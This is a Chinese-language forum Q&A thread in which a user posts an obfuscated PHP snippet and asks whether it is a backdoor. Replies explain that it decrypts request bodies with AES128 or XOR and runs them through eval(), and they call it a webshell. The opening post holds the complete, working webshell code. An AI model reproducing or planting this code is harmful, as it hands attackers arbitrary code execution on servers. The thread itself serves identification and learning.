English 简体 繁體
  • 注册
  • 我要提问 我要提问 关注:88 内容:1135

    谁给看看这吊毛代码是不是后门

  • 查看作者
  • 打赏作者
  • 问答版块禁止水贴,禁止灌水,发现或者被举报直接扣除20水币!
    当前位置: 35博客圈 > 我要提问 > 正文
    • 6
    • 我要提问
    • LV4
      水晶之恋

      <?php @error_reporting(0);$i='f'.'f'.'2'.'9'.'2'.'6'.'b'.'a'.'0'.'c'.'a'.'5'.'4'.'e'.'c'.'a';$_SESSION['k']=$i;session_write_close();$j=file_get_contents(“php://input”);if(!extension_loaded('openssl')){$k=”base64_”.”decode”;$j=$k($j.””);for($l=0;$l<strlen($j);$l++){$j[$l]=$j[$l]^$i[$l+1&15];}}else{$j=openssl_decrypt($j,”AES128″,$i);}$m=explode('|',$j);$n=$m[0];$o=$m[1];class C{public function __invoke($p){eval($p.””);}}@call_user_func(new C(),$o);

      LV11
      vip1

      代码被混淆并以base64编码

      看起来像后门。它接受来自php://input并用AES128对其进行解密。

      然后,它使用分隔符“|”拆分解密的字符串。

      第一部分存储在$n中,第二部分存储在$0中。

      然后使用eval()执行第二部分。

      代码试图通过使用类隐藏自己,然后使用call_user_func()调用该类。

      该代码是一个后门,用于在服务器上执行任意代码。

      123网盘,本人大部分资源都是搬运的,勿充钱购买,不解答问题

      回复
      LV7
      水晶之恋

      Webshell

      回复

      是的

      QQ:3258794818

      回复

      小马



      回复
      LV8
      水晶之恋
      原来木马是这样的 [s-11]
      回复
      第一次在大神的指引下直面木马
      回复

      问答板块严查恶意、辱骂、讽刺等评论,如发现此类评论轻则小黑屋,重则永久封禁!

      如果发现帖子违规,用户可以点击帖子标题旁的向下箭头,选择举报内容

      如果联系请站内私信联系,禁止留下QQ,微信等联系方式否则会被系统拦截

      如果想挣取水币,请在[手游分享] [端游分享]版块分享资源赚取水币

      请登录之后再进行评论

      登录
    • 任务
    • 管理
    • 回底部
    • 帖子间隔 侧栏位置: